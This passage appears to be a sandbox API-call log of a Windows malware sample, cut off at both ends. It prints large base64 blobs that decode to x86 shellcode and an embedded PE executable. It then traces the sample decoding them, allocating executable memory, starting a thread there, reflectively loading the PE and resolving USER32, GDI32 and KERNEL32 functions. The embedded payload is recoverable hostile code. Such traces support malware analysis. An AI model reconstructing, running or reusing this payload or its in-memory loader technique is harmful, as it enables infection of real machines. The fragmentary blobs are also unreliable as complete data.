/gAAAAFdqA1NqAWgAAACAjUUAUIs1CIEDEP/WiUXkg/j/dCyNRQBQ/3XUjYUYAQAAUItN5OjX/f//AyUMAAAAhcAPhE0BAACJfdjpRQEAAIldyI1NyFFQ/xXcgAMQiUXMOV3ID4UrAQAAQFBqQP8VgIADEIlF3DnYD4QWAQAAU41F0FD/dcz/ddz/deT/FYSAAxCFwA+E+gAAAP915P8ViIADEIld5FNXagNTagJoAAAAQI1FAFD/1olF5IP4/w+E0AAAAI2F6P7//1CLddxW6HxdAwBZWYnHU41F0FA533Uz/3XQVv915P8VjIADEIXAD4SeAAAAjUUAUP911I2F6P7//1CLTeToBP3//wMlDAAAAOt1ifgp8FBW/3XkizWMgAMQ/9aFwHRrjUUAUP911I2F6P7//1CLTeTo0fz//wMlDAAAAIXAdEuNhej+//+NUAGKCEA42XX5KdCJRdSNhej+//+NSAGKEEA42nX5KchTjU3QUYtN3CtN1Cn5A03MUQH4UP915P/WhcB0B8dF2AEAAADHRfz+////6FD8//+LRdiLTfBkiQ0AAAAAWV9eW4uNJAEAADHp6HL8//+BxSgBAADJw8NmDx+EAAAAAACNBaAQABCjGIMFEMPMzMzMg+wIiw2wgwUQg8j/hcnHRCQEAAAAAHQ+jUQkBGoAUI1UJAhqBFJqAGoAaAAkiYVRx0QkIAAAAAD/FZCAAxCFwHQPgTwkABAAAHUGMcCDxAjDuPn///+DxAjDZg8fRAAAjQUwFAAQo7iDBRCNBbAUABCjvIMFEMNmDx+EAAAAAABVieWD7CBWvnSBBBBWagBoAQASAP8VlIADEIXAo7SDBRB1M2oBjUXsUP8VEIADEIXAdCODZfwAjUXsVolF+GoAjUX0UMdF9AwAAAD/FZiAAxCjtIMFEDHAOQW0gwUQXg+VwMPMzMzMzMzMzMzMzMzMVVNXVoHsQAQAAIu8JFwEAACLtCRYBAAAi6wkVAQAAFVobRUAEA+EV1IDAA+FUVIDAKYBAABUBwAA2iEAANIDAAA6GAAAuhwAAEQIAABAieNQVVNojhUAEA+E0lQDAA+FzFQDAP8VoIADECsNAACDxAxTaK0VABAPhBFSAwAPhQtSAwD/FaiAAxDwFQAAhcB1OlNo2xUAEA+E/VEDAA+F91EDAJcjAAB1EQAAlR8AAOcjAABSCQAA9BAAAIXAdDt1Cv8VDIADEFQdAABXVlBoCRYAEA+E5wAAAA+F4QAAAP8VCIADELEZAACJwYnIgcRABAAAXl9bXcIMALgA/P//kMaEBEAEAAAAQHX1U2hZFgAQD4RrUQMAD4VlUQMAbCEAABMIAAApEwAAfCAAAH0OAAAoBAAAYQsAAIoUJID6LnRFdQRAAQAA99i7APz//2aQjSwYMcmB/QD8//90jnUE0gMAAIXbD4SA////dQTHGAAAiJQcQAQAAA+2lBwBBAAAQ4D6LnXKjUQkQFdWUGjSFgAQD4Ro/v//D4Vi/v//GRIAAN0AAAAAEwAAaSMAABMYAADpMv///2YPH4QAAAAAAFVTV1aB7BwIAACLrCQwCAAAhe0PhDsFAAB1BP0VAACLTTyJyIlMJBCLTCl4McCLdCkYhfYPhBwFAAB1BEYMAACLlCQ0CAAAi0QpHIt8KSSLXCkgM5QkOAgAAAHoAe8B64lEJAiNBCmJRCQMiVQkFJCLAwHoUI1EJCBQaIcXABAPhFtQAwAPhVVQAwBYAQAABwIAACkdAACUCgAAoRYAAP0TAADeFwAAikQkHITAdCh1BOcdAACNTCQdDx+AAAAAAInCgMKfgPoZdwUE4IhB/w+2AUGEwHXpjUQkHIk8JFBo2hcAEA+E2E8DAA+F0k8DAP8VBIADEK0gAACD+AGJXCQYdR0PtkwkHIHBmgIAAInL6eYCAABmLg8fhAAAAAAAkInHg/gQc1mF/w+EfgIAAHUK/xVIggMQFBkAALiaAgA", cchString=0x787d9, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x1bf9a4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x1bf9a4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0022.792] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5a5e0) returned 0x5e8b90 [0022.793] CryptStringToBinaryA (in: pszString="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", cchString=0x787d9, dwFlags=0x6, pbBinary=0x5e8b90, pcbBinary=0x1bf9a4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x5e8b90, pcbBinary=0x1bf9a4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0022.797] VirtualAlloc (lpAddress=0x0, dwSize=0x5a5e0, flAllocationType=0x3000, flProtect=0x40) returned 0x2a0000 [0022.803] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2a0000, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x34 [0022.805] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e8b90 | out: hHeap=0x5d0000) returned 1 [0022.805] RtlExitUserThread (Status=0x0) [0022.805] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ded68 | out: hHeap=0x5d0000) returned 1 Thread: id = 2 os_tid = 0x9a4 [0022.811] GetProcAddress (hModule=0x76c20000, lpProcName="IsBadReadPtr") returned 0x76c5d075 [0022.812] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0022.812] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0022.812] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0022.812] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0022.812] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0022.812] VirtualAlloc (lpAddress=0x10000000, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x0 [0022.812] VirtualAlloc (lpAddress=0x0, dwSize=0x5c000, flAllocationType=0x1000, flProtect=0x4) returned 0x70000 [0022.812] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x20000 [0022.817] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0025.322] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000 [0025.322] GetProcAddress (hModule=0x74f40000, lpProcName="GetForegroundWindow") returned 0x74f62320 [0025.322] GetProcAddress (hModule=0x74f40000, lpProcName="CloseWindow") returned 0x74f9999a [0025.322] GetProcAddress (hModule=0x74f40000, lpProcName="PostQuitMessage") returned 0x74f59abb [0025.322] GetProcAddress (hModule=0x74f40000, lpProcName="ShutdownBlockReasonCreate") returned 0x74fba84e [0025.322] GetProcAddress (hModule=0x74f40000, lpProcName="DefWindowProcA") returned 0x771724e0 [0025.322] GetProcAddress (hModule=0x74f40000, lpProcName="DeferWindowPos") returned 0x74f6640f [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="EnumChildWindows") returned 0x74f60e94 [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="ShutdownBlockReasonDestroy") returned 0x74fba88e [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="RegisterClassExW") returned 0x74f5b17d [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="CreateWindowExW") returned 0x74f58a29 [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="GetMessageA") returned 0x74f57bd3 [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="TranslateMessage") returned 0x74f57809 [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="DispatchMessageA") returned 0x74f57bbb [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="ReleaseDC") returned 0x74f57446 [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="DestroyWindow") returned 0x74f59a55 [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="AdjustWindowRect") returned 0x74f6c6c6 [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="AnimateWindow") returned 0x74f6b531 [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="MessageBoxW") returned 0x74fafd3f [0025.323] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0025.323] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75ad0000 [0025.324] VirtualQuery (in: lpAddress=0xe0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xe0000, AllocationBase=0xe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0025.324] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0xf0000 [0025.324] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0025.324] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteObject") returned 0x75ae5689 [0025.324] GetProcAddress (hModule=0x75ad0000, lpProcName="SetPixel") returned 0x75aeccee [0025.324] GetProcAddress (hModule=0x75ad0000, lpProcName="GetDeviceCaps") returned 0x75ae4de0 [0025.324] GetProcAddress (hModule=0x75ad0000, lpProcName="SelectPalette") returned 0x75ae5a86 [0025.324] GetProcAddress (hModule=0x75ad0000, lpProcName="SetPaletteEntries") returned 0x75b1535b [0025.324] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0025.324] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0025.324] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000 [0025.325] VirtualFree (lpAddress=0xf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="LocalAlloc") returned 0x76c3168c [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 